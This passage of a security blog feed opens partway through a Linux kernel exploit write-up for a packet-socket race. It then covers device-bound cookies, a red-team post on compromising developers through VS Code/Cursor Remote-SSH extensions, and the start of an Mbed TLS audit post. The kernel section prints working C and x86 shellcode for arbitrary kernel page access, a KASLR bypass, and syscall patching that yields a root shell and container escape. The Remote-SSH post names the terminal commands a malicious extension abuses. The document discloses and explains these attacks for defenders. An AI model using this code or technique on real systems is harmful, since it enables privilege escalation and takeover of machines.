    munmap(mem, primitive-&gt;overwrite_pg_vec_mmap_size);

    // Step 2: mmap the puppet &#8212; block 0 now maps to target_addr
    mem = mmap(NULL, primitive-&gt;overwritten_pg_vec_mmap_size,
               PROT_READ | PROT_WRITE, MAP_SHARED,
               primitive-&gt;packet_socket_with_overwritten_pg_vec, 0);
    return mem;   // userspace pointer to arbitrary kernel page
}</code></pre></div><p>The caller receives a userspace pointer that directly maps the target kernel page. Reading from it reads kernel memory; writing to it writes kernel memory. No syscalls, no filters, no size limits &#8212; just raw memcpy. The only constraint is page alignment.</p><p>This primitive is used by Stage 4 (reading pipe buffers to find a kernel code pointer) and Stage 5 (overwriting a syscall handler with shellcode).</p><h3>Stage 4: KASLR Bypass via Pipe Buffer</h3><p>With arbitrary page read/write, the exploit can access any kernel page &#8212; but it doesn&#8217;t yet know <em>where</em> anything is. KASLR (Kernel Address Space Layout Randomization) randomizes the kernel&#8217;s base address at each boot, so the addresses of symbols like init_cred, init_fs, and syscall handlers are unknown. To defeat KASLR, the exploit needs to find a single kernel <strong>code pointer</strong> &#8212; a pointer into the kernel&#8217;s .text or .data segment &#8212; and subtract a known offset to recover the base address.</p><h4>Background: pipe buffers and anon_pipe_buf_ops</h4><p>Linux pipes are backed internally by an array of struct pipe_buffer entries, each describing one segment of data in the pipe:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;92ba3c7a-eae5-41b2-8de9-5ec1657755e9&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">struct pipe_buffer {
    struct page *page;              // pointer to the data page
    unsigned int offset, len;       // offset and length within the page
    const struct pipe_buf_operations *ops;  // &#8594; anon_pipe_buf_ops
    unsigned int flags;
    unsigned long private;
};  // 40 bytes</code></pre></div><p>The ops field is a pointer to anon_pipe_buf_ops, a static const struct in the kernel&#8217;s .data section. Its address is always at a fixed offset from the kernel base &#8212; in the target kernel, 0x1c4a600 bytes from the base. KASLR shifts the entire kernel image, so the absolute address changes each boot, but the lower 24 bits (0xc4a600) remain constant because KASLR only randomizes the upper bits. The exploit uses these lower bits as a signature to recognize a valid pipe_buffer.</p><p>The pipe buffer array is allocated via kcalloc(nr_slots, sizeof(struct pipe_buffer)) when the pipe is created or resized. The number of slots is controlled by fcntl(F_SETPIPE_SZ), which sets the pipe&#8217;s capacity in bytes &#8212; the kernel rounds this up to the nearest power-of-two number of pages, then allocates that many pipe_buffer entries. Crucially, the ops field is only populated when data is actually written to the pipe &#8212; an empty pipe has zeroed pipe_buffer entries.</p><h4>The technique</h4><p>The exploit runs a retry loop:</p><p><strong>Step 1: Leak a page address.</strong> Using the same allocate-read-free pattern from Stage 3 &#8212; create a temporary xattr via setxattr(), read the manipulated xattr&#8217;s rb_node.rb_right or rb_node.rb_left to get the new xattr&#8217;s kernel address (pipe_buffer_addr), then removexattr() to free it. 
The freed page goes back to the order-2 freelist.</p><p><strong>Step 2: Reclaim with a pipe buffer array.</strong> Create a pipe with pipe2(pipe_fd, O_DIRECT) and resize it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;edc0c9d2-effa-4f50-b032-d7171cd17c44&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">fcntl(pipe_fd[0], F_SETPIPE_SZ, 256 * PAGE_SIZE);</code></pre></div><p>This tells the kernel to allocate 256 pipe_buffer entries: 256 &#215; 40 = 10,240 bytes, which exceeds kmalloc-8k and falls through to the page allocator, served from order-2 pages (16 KB) &#8212; the same page order as the just-freed xattr. If the pipe buffer array lands on the just-freed page, the exploit now has a pipe_buffer array at a known kernel address.</p><p><strong>Step 3: Populate the ops pointer.</strong> Write data to the pipe to fill in the first pipe_buffer entry:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;77d4a49e-4378-4478-94ef-b3b03d0f2111&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">write(pipe_fd[1], &quot;fillin_pipe_buffer&quot;, 18);</code></pre></div><p>Before this write, the pipe_buffer entries are zeroed (from kcalloc).
After the write, the first entry&#8217;s page points to a data page, ops points to anon_pipe_buf_ops, and len reflects the data length.</p><p><strong>Step 4: Read and identify.</strong> Use the arbitrary page read primitive from Stage 3 to map the leaked page address:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;cad87eb5-621e-4dae-a1a1-60f30834af82&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">void *mem = abr_page_read_write_primitive_mmap(primitive, pipe_buffer_addr);</code></pre></div><p>Then check if the data looks like a pipe_buffer. The heuristic checks two things: page must be a valid kernel pointer (upper 16 bits = 0xFFFF), and ops must have the right lower 24 bits matching anon_pipe_buf_ops. If both match, this is almost certainly a real pipe_buffer.</p><p><strong>Step 5: Calculate the kernel base.</strong></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;4eb4cb45-9ca1-477b-95bc-b03d5cfd15de&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">kernel_base = (u64)pipe_buffer-&gt;ops - anon_pipe_buf_ops_offset_from_kernel_base;
// kernel_base = ops - 0x1c4a600</code></pre></div><p>If the reclamation failed (the pipe buffer array didn&#8217;t land on the leaked page, or the data doesn&#8217;t match), the exploit closes the pipe and retries from Step 1. Once the kernel base is known, the exploit can compute the absolute addresses of init_cred, init_fs, __do_sys_kcmp, and __x86_return_thunk &#8212; everything needed for Stage 5.</p><h3>Stage 5: Privilege Escalation via Syscall Patching</h3><p>With the kernel base known and arbitrary page write available, the exploit overwrites the __do_sys_kcmp syscall handler with custom shellcode:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;d280aec2-791f-4cb9-8061-830af6416fca&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">mov rax, QWORD PTR gs:0x20c80     ; current task_struct
shl rdi, 32                       ; reconstruct init_cred from
shl rsi, 32                       ;   arg1 (high 32 bits) and
shr rsi, 32                       ;   arg2 (low 32 bits)
or  rdi, rsi
mov QWORD PTR [rax + 0x7d0], rdi  ; task-&gt;real_cred = init_cred
mov QWORD PTR [rax + 0x7d8], rdi  ; task-&gt;cred = init_cred
mov QWORD PTR [rax + 0x828], rcx  ; task-&gt;fs = init_fs
jmp r8                            ; return via __x86_return_thunk</code></pre></div><p>The shellcode passes init_cred and init_fs addresses through syscall arguments (encoded across rdi/rsi/rcx/r8), replacing the calling process&#8217;s credentials with init_cred (root) and its filesystem namespace with init_fs (escaping the container). One syscall(SYS_kcmp, ...) call and the process is root with access to the host filesystem:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;ff7436e5-cb7e-4c99-b7a8-11170408180d&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">syscall(SYS_kcmp,
    (u32)(init_cred &gt;&gt; 32), (u32)(init_cred),
    -1, init_fs, __x86_return_thunk);
execve(&quot;/bin/sh&quot;, sh_args, NULL);  // root shell</code></pre></div><h2>The Fix</h2><p>The fix is elegant &#8212; just two lines of logic change in packet_set_ring(), mirroring an earlier fix (commit 15fe076edea7):</p><p><strong>Before (vulnerable)</strong>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;19e0fc93-4179-41cf-b865-262df1fdec8b&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">
spin_lock(&amp;po-&gt;bind_lock);
was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING);
num = po-&gt;num;
if (was_running) {
    WRITE_ONCE(po-&gt;num, 0);        // conditional!
    __unregister_prot_hook(sk, false);
}
spin_unlock(&amp;po-&gt;bind_lock);
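// (Annotation, ours: if was_running was false, po-&gt;num is still
//  nonzero here, so a concurrent NETDEV_UP in packet_notifier() can
//  call register_prot_hook() during the critical section below.)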
// ... critical section ...
spin_lock(&amp;po-&gt;bind_lock);
if (was_running) {
    WRITE_ONCE(po-&gt;num, num);      // conditional!
    register_prot_hook(sk);
}
spin_unlock(&amp;po-&gt;bind_lock);</code></pre></div><p><strong>After (fixed)</strong>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;70b4f3eb-b3e5-46bb-9e35-45f467d6fb69&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">spin_lock(&amp;po-&gt;bind_lock);
was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING);
num = po-&gt;num;
WRITE_ONCE(po-&gt;num, 0);            // unconditional!
if (was_running)
    __unregister_prot_hook(sk, false);
spin_unlock(&amp;po-&gt;bind_lock);
// ... critical section ...
spin_lock(&amp;po-&gt;bind_lock);
WRITE_ONCE(po-&gt;num, num);          // unconditional!
if (was_running)
    register_prot_hook(sk);
spin_unlock(&amp;po-&gt;bind_lock);</code></pre></div><p>By <em>unconditionally</em> zeroing po-&gt;num before releasing bind_lock, the fix ensures that packet_notifier()&#8217;s NETDEV_UP handler will see po-&gt;num == 0 and skip the register_prot_hook() call. The socket cannot be re-hooked during the critical window, regardless of whether it was running. The po-&gt;num value is unconditionally restored afterward.</p><h2>Takeaways</h2><h3>For Kernel Developers</h3><ol><li><p><strong>Be defensive about lock gaps.</strong> When code releases one lock and acquires another, consider what invariants might be violated in the gap. The fix here is instructive: even though zeroing po-&gt;num seemed unnecessary when the socket wasn&#8217;t running, it was the only safe choice because external events (netdev notifications) could observe the intermediate state.</p></li></ol><ol start="2"><li><p><strong>Conditional state updates are subtle.</strong> The original code&#8217;s if (was_running) guard on WRITE_ONCE(po-&gt;num, 0) made logical sense (&#8221;why zero it if it&#8217;s not running?&#8221;) but created a security hole. When state is used for synchronization across concurrent code paths, <strong>always set it to the safe value, not just when you think it matters</strong>.</p></li></ol><ol start="3"><li><p><strong>TPACKET_V3 metadata survives ring buffer free.</strong> The prb_bdqc structure retains stale pointers after packet_set_ring() frees the ring buffer. While fixing the race condition prevents the UAF, this stale metadata is a defense-in-depth concern.</p></li></ol><h3>For Security Researchers</h3><ol><li><p><strong>Look for sleeping mutex holders.</strong> The central insight of this exploit is a bug-finding pattern: find code sequences with a lock gap (release lock A, acquire lock B), then look for any code path that holds lock B and can sleep. 
Mutexes, unlike spinlocks, allow the holder to sleep, and kernel code is full of wait_for_completion(), schedule(), copy_from_user(), and similar calls inside mutex-protected sections. If you can trigger such a path, you&#8217;ve turned a nanosecond race into a controllable one.</p></li></ol><ol start="2"><li><p><strong>Conditional logic near locks is a smell.</strong> Any time you see a conditional that determines whether synchronization state is updated, ask: &#8220;What happens if the condition is false but some other code path is observing this state?&#8221; The if (was_running) pattern that caused this vulnerability is a recurring motif in kernel race conditions.</p></li></ol><ol start="3"><li><p><strong>Page allocator buddy splitting enables cross-order heap grooming.</strong> The exploit leverages the buddy allocator&#8217;s splitting behavior: when order-2 pages are exhausted, the allocator splits order-3 pages. This is used to place simple_xattr objects (order 2) adjacent to ring buffer blocks (order 3 for victim, order 2 for reclamation). Understanding buddy allocator behavior is essential for modern kernel exploitation.</p></li></ol><ol start="4"><li><p><strong>Multiple races can be chained.</strong> This exploit wins two separate races, each with different techniques (deterministic mutex holding for the first, BPF filter + timer interrupt for the second). The willingness to chain multiple probabilistic steps, retrying on failure, is what makes the full exploit chain possible.</p></li></ol><ol start="5"><li><p><strong>Modern mitigations increase complexity but don&#8217;t prevent exploitation.</strong> As described in the Background section, CONFIG_RANDOM_KMALLOC_CACHES and CONFIG_SLAB_VIRTUAL forced the exploit to use same-callsite allocations (ring buffers to reclaim ring buffers) rather than arbitrary cross-cache attacks. 
The entire exploit architecture &#8212; from using TX ring buffers to reclaim freed RX ring buffers, to spraying pgv arrays to corrupt other pgv arrays &#8212; is shaped by this constraint. It raises the bar significantly but, as demonstrated, does not stop a determined attacker with a sufficiently powerful vulnerability.</p></li></ol>]]></content:encoded></item><item><title><![CDATA[A history of device-bound cookies]]></title><description><![CDATA[The recent announcement from Google about Device Bound Session Credentials (DBSC) sent me down memory lane.]]></description><link>https://blog.calif.io/p/a-history-of-device-bound-cookies</link><guid isPermaLink="false">https://blog.calif.io/p/a-history-of-device-bound-cookies</guid><dc:creator><![CDATA[Thai Duong]]></dc:creator><pubDate>Sun, 24 Aug 2025 10:47:12 GMT</pubDate><content:encoded><![CDATA[<p>The recent <a href="https://workspace.google.com/blog/identity-and-security/defending-against-account-takeovers-top-threats-passkeys-and-dbsc">announcement</a> from Google about Device Bound Session Credentials (<a href="https://github.com/w3c/webappsec-dbsc">DBSC</a>) sent me down memory lane.</p><p>Back when several TLS attacks were discovered, attacks that could let remote adversaries decrypt HTTPS cookies, I went searching for a stronger defense.</p><p>That is when I ran into <a href="https://www.linkedin.com/in/dirk-balfanz-7885852/?lipi=urn%3Ali%3Apage%3Ad_flagship3_detail_base%3BAGA6SJ0uTCO%2BvntGxbrgJQ%3D%3D">Dirk Balfanz</a>. He told me about Channel ID, or Channel-Bound Cookies. Dirk was one of the inventors of the security key, which I still consider one of the best security inventions of the past twenty years. When he spoke about authentication, I paid close attention.</p><p>Channel ID worked by giving each client machine a unique public key. During the TLS handshake, the client proved possession of the matching private key through a TLS extension. 
In effect, it was like TLS client authentication, only simpler because it avoided the complexity of renegotiation and certificates.</p><p>Cookies issued to the machine would then be bound to that machine ID. If the private key lived inside a security key or a TPM, the cookies could only be used on that specific machine. In theory, cookie theft would no longer be possible.</p><p>I loved the idea and volunteered to help make it real. That required changes in both Chrome and Google Accounts, the enormous authentication system behind all Google products. Google was so open at the time that a random engineer like me could contribute code, with reviews of course, to such critical infrastructure.</p><p>Most of my time, however, went into debugging. There were endless false positives. Broken TLS setups would cause machine IDs to change, and the server would mistakenly flag legitimate sessions as stolen cookies.</p><p>The deeper problem was that we could not find a single confirmed case of a Googler&#8217;s cookies being stolen. Maybe it never happened during the quarters I poured myself into the project. Or maybe it did, and those signals were simply lost in a flood of false alerts.</p><p>This was my 20% project. And when a 20% project stalls, you pick another. <a href="https://x.com/sirdarckcat?lang=en">Eduardo</a> soon asked me to implement PGP in JavaScript, which sounded much more fun than wrestling with TLS handshakes, so I told Dirk I was moving on.</p><blockquote><p>The Channel ID project failed, but it taught me a lasting lesson: security is not just about finding vulnerabilities. Real impact comes from building secure products and a safer Internet. Bug hunting is only one path. Security engineers must also fix issues and design systems that neutralize whole classes of flaws. This belief continues to guide our work at Calif.</p></blockquote><p>Fast forward to today. 
The new DBSC proposal has the same goal as Channel ID, stopping cookie theft by binding cookies to machines, but with important differences. Instead of anchoring the machine ID in TLS, it shifts up the stack to HTTP. And instead of a single machine ID across all connections to a domain, which could become a tracking vector, it uses unique session IDs managed with simple HTTP requests and responses.</p><p>And apparently, this simple design works!</p>]]></content:encoded></item><item><title><![CDATA[“Vibe Hacking”: Abusing Developer Trust in Cursor and VS Code Remote Development]]></title><description><![CDATA[Update: Mauro Soria pointed out that this attack vector can be easily adapted for phishing scenarios:]]></description><link>https://blog.calif.io/p/vibe-hacking-abusing-developer-trust</link><guid isPermaLink="false">https://blog.calif.io/p/vibe-hacking-abusing-developer-trust</guid><pubDate>Mon, 18 Aug 2025 10:27:47 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!mvoF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Update</strong>: <a href="https://www.linkedin.com/in/mauro-soria-63268b22/">Mauro Soria</a> pointed out that this attack vector can be easily adapted for phishing scenarios:</p><ol><li><p>Share a GitHub repo</p></li><li><p>Give some instructions to access the attacker server with Cursor or VS Code.</p></li></ol><p>Basically, if you click on something like <a href="http://vscode://vscode-remote/ssh-remote+user@hostname/home/user/project">vscode://vscode-remote/ssh-remote+user@hostname/home/user/project</a> to open VS Code, you might get popped!</p><p>In a recent red team engagement, the client's attack surface was so well-defended that after months of effort, the only system we managed to compromise was a lone server, which was apparently isolated 
from the rest of the network. Or so we thought.</p><p>One developer had been using that server for <a href="https://code.visualstudio.com/docs/remote/remote-overview">remote development</a> with <a href="https://cursor.com/">Cursor</a>. This setup is becoming increasingly popular: developers run AI agents remotely to protect their local machines.</p><p>But when we dug deeper into how Cursor works, we discovered something unsettling. By pivoting through the remote server, we could actually compromise the developer's local machine.</p><p>This wasn't a Cursor-specific flaw. The root cause lies in the Remote-SSH extension that Cursor inherits directly from VS Code. Which means the attack path we uncovered could extend across the entire VS Code remote development ecosystem, putting any developer who connects to an untrusted server at risk.</p><p>On the Remote-SSH extension <a href="https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-ssh">page</a>, Microsoft states:</p><blockquote><p><em>Only use Remote-SSH to connect to secure remote machines that you trust and that are owned by a party whom you trust. A compromised remote could use the VS Code Remote connection to execute code on your local machine.</em></p></blockquote><p>Despite clear warnings, a dangerous misconception persists among developers that "remote development" is fully isolated on the server. This belief is increasingly common as developers use remote environments as "sandboxes" to safely run AI agents without risking their local machines.</p><p>Given this powerful use case, the assumption of total isolation is understandable. However, Microsoft has <a href="https://github.com/microsoft/vscode-remote-release/issues/6608#issuecomment-1112960548">suggested</a> that no changes will be made to enhance the extension's safety to meet this expectation. 
This raises a critical question: how hard is it for your machine to be compromised if you connect to an untrusted server?</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!mvoF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!mvoF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 424w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 848w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!mvoF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg" width="1456" height="424" 
data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:424,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!mvoF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 424w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 848w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" 
xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The answer: it's easy. <strong>Once the server is hacked, you are hacked as well</strong>. <a href="https://fly.io/blog/vscode-ssh-wtf/">Thomas Ptacek</a> outlined several attack paths, and our research uncovered a method to compromise the client without delving into low-level details. Our attack works in the default settings of Cursor or VS Code.</p><p>When you connect to a remote development server, a malicious extension on the server can execute the <a href="https://github.com/microsoft/vscode/blob/3f71dc0d8e0c8fdebc22f023909a6c19c5b50145/src/vs/workbench/contrib/terminal/electron-browser/terminalRemote.ts#L17">workbench.action.terminal.newLocal</a> command to open a terminal on your local machine. This is a terminal on your local machine, not the server. 
Once the terminal is open, the extension can execute the <a href="http://workbench.action.terminal.sendsequence">workbench.action.terminal.sendSequence</a> command to send text followed by a newline character to the terminal, which executes it as if the user had pressed Enter. We can also leverage another feature to establish a seamless Command &amp; Control channel between the server and the local machine, but that is beyond the scope of this post.</p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;77ef9934-782e-4e27-aa41-953402dcf13a&quot;,&quot;duration&quot;:null}"></div><p>Our goal in publishing this post is to raise awareness of the risks of remote development and to call for improvements that address the root causes of this issue. Monitoring the <strong>~/.cursor-server</strong> directory for changes can serve as a workaround, but it offers limited protection if the server is fully compromised. Securing the Remote-SSH extension is a better approach. For example, requiring user approval when a remote extension attempts to open a new local terminal or send keys to an active local terminal would help block the described attack. As there might be other attack vectors, fixing this issue entirely will take significant effort.
A good direction is to move toward secure-by-default designs that don&#8217;t rely on users making trust decisions.</p><p>Contributors: Tuyen Le, An Nguyen, Khanh Pham</p>]]></content:encoded></item><item><title><![CDATA[Partnering with Google to Strengthen Open-Source Crypto: An Mbed TLS Security Audit]]></title><description><![CDATA[By Linh Le and Ngan Nguyen]]></description><link>https://blog.calif.io/p/partnering-with-google-to-strengthen</link><guid isPermaLink="false">https://blog.calif.io/p/partnering-with-google-to-strengthen</guid><pubDate>Sat, 05 Jul 2025 03:15:45 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!cETj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cETj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cETj!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 424w, https://substackcdn.com/image/fetch/$s_!cETj!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 848w, https://substackcdn.com/image/fetch/$s_!cETj!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 1272w, 
https://substackcdn.com/image/fetch/$s_!cETj!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cETj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png" width="1456" height="1225" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1225,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:729593,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/167563472?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!cETj!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 424w, https://substackcdn.com/image/fetch/$s_!cETj!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 848w, 
https://substackcdn.com/image/fetch/$s_!cETj!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 1272w, https://substackcdn.com/image/fetch/$s_!cETj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 1456w" sizes="100vw" fetchpriority="high"></picture></div></a></figure></div><h3><strong>Partnering with Google to Strengthen Open-Source Crypto: An Mbed TLS Security Audit</strong></h3><p>We're
